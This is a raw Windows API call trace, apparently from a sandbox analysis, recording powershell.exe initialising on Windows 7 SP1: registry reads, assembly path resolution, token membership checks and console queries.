	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x2ce8a3c, puLen=0xcda10) returned 1
	[0104.935] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0104.935] CoTaskMemAlloc (cb=0x66) returned 0x1ae260
	[0104.935] lstrcpyW (in: lpString1=0x1ae260, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0104.935] CoTaskMemFree (pv=0x1ae260) 
	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcda18, puLen=0xcda10 | out: lplpBuffer=0xcda18*=0x0, puLen=0xcda10) returned 0
	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd9e8, puLen=0xcd9e0 | out: lplpBuffer=0xcd9e8*=0x2ce89e4, puLen=0xcd9e0) returned 1
	[0104.935] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0104.935] VerLanguageNameW (in: wLang=0x0, szLang=0x1cf910, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0104.935] CoTaskMemFree (pv=0x1cf910) 
	[0104.935] VerQueryValueW (in: pBlock=0x2ce8948, lpSubBlock="\\", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2ce8970, puLen=0xcda30) returned 1
	[0104.993] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0104.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.993] CoTaskMemFree (pv=0x230700) 
	[0104.999] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0104.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.999] CoTaskMemFree (pv=0x230700) 
	[0105.005] lstrlenW (lpString="䅁") returned 1
	[0105.017] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd908 | out: phkResult=0xcd908*=0x304) returned 0x0
	[0105.019] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd8f8 | out: phkResult=0xcd8f8*=0x308) returned 0x0
	[0105.019] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd988 | out: phkResult=0xcd988*=0x30c) returned 0x0
	[0105.025] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd8cc, lpData=0x0, lpcbData=0xcd8c8*=0x0 | out: lpType=0xcd8cc*=0x1, lpData=0x0, lpcbData=0xcd8c8*=0x56) returned 0x0
	[0105.026] CoTaskMemAlloc (cb=0x5a) returned 0x1ae3b0
	[0105.026] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd89c, lpData=0x1ae3b0, lpcbData=0xcd898*=0x56 | out: lpType=0xcd89c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd898*=0x56) returned 0x0
	[0105.026] CoTaskMemFree (pv=0x1ae3b0) 
	[0105.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.133] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0105.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.133] CoTaskMemFree (pv=0x230700) 
	[0105.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0105.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0105.950] CoTaskMemAlloc (cb=0x104) returned 0x21a4e0
	[0105.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21a4e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.950] CoTaskMemFree (pv=0x21a4e0) 
	[0105.952] CoTaskMemAlloc (cb=0x104) returned 0x21a4e0
	[0105.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21a4e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.952] CoTaskMemFree (pv=0x21a4e0) 
	[0106.038] CoTaskMemAlloc (cb=0x104) returned 0x21a610
	[0106.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21a610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.038] CoTaskMemFree (pv=0x21a610) 
	[0106.040] CoTaskMemAlloc (cb=0x104) returned 0x21a610
	[0106.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21a610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.040] CoTaskMemFree (pv=0x21a610) 
	[0106.041] CoTaskMemAlloc (cb=0x104) returned 0x21a610
	[0106.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21a610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.041] CoTaskMemFree (pv=0x21a610) 
	[0106.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0106.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0106.492] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0106.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.492] CoTaskMemFree (pv=0x230700) 
	[0106.495] CoTaskMemAlloc (cb=0x104) returned 0x230700
	[0106.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.495] CoTaskMemFree (pv=0x230700) 
	[0106.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0106.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0107.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0107.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0108.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0108.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0108.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0108.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0108.965] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0108.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.965] CoTaskMemFree (pv=0x1b8470b0) 
	[0108.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0109.184] SetErrorMode (uMode=0x1) returned 0x1
	[0109.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0109.184] SetErrorMode (uMode=0x1) returned 0x1
	[0110.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.067] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.067] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.070] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.070] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.071] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.071] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.075] CoCreateGuid (in: pguid=0xcdc28 | out: pguid=0xcdc28*(Data1=0x2a8f74b8, Data2=0xabdc, Data3=0x4a03, Data4=([0]=0xa2, [1]=0xd2, [2]=0xa0, [3]=0xc6, [4]=0xa2, [5]=0x7b, [6]=0x7b, [7]=0xd1))) returned 0x0
	[0110.080] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.080] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.084] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.084] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.087] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.087] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.095] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0110.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd8d0 | out: lpConsoleScreenBufferInfo=0xcd8d0) returned 1
	[0110.123] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0110.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd8d0 | out: lpConsoleScreenBufferInfo=0xcd8d0) returned 1
	[0110.124] GetVersionExW (in: lpVersionInformation=0xcd860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0110.127] GetCurrentProcess () returned 0xffffffffffffffff
	[0110.128] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd8f8 | out: TokenHandle=0xcd8f8*=0x320) returned 1
	[0110.131] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd818 | out: TokenInformation=0x0, ReturnLength=0xcd818) returned 0
	[0110.132] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x197120
	[0110.132] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x197120, TokenInformationLength=0x4, ReturnLength=0xcd818 | out: TokenInformation=0x197120, ReturnLength=0xcd818) returned 1
	[0110.134] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd978 | out: phNewToken=0xcd978*=0x31c) returned 1
	[0110.134] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd818 | out: TokenInformation=0x0, ReturnLength=0xcd818) returned 0
	[0110.135] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x197150
	[0110.135] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x197150, TokenInformationLength=0x4, ReturnLength=0xcd818 | out: TokenInformation=0x197150, ReturnLength=0xcd818) returned 1
	[0110.136] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2dc36f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd988 | out: IsMember=0xcd988) returned 1
	[0110.136] CloseHandle (hObject=0x31c) returned 1
	[0110.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.209] CoTaskMemAlloc (cb=0x804) returned 0x1b84a080
	[0110.209] GetConsoleTitleW (in: lpConsoleTitle=0x1b84a080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0110.209] CoTaskMemFree (pv=0x1b84a080) 
	[0110.222] CoTaskMemAlloc (cb=0x804) returned 0x1b84a930
	[0110.222] GetConsoleTitleW (in: lpConsoleTitle=0x1b84a930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0110.222] CoTaskMemFree (pv=0x1b84a930) 
